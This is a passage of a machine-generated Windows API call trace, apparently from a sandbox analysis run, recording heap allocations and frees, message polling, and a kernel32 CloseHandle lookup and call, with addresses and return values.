dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.907] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.907] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.907] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.907] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.907] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.908] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.909] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.909] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.910] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.911] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.912] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0041.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.913] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0041.913] CloseHandle (hObject=0x140) returned 1 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.914] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.914] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.914] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.914] RtlAllocateHeap 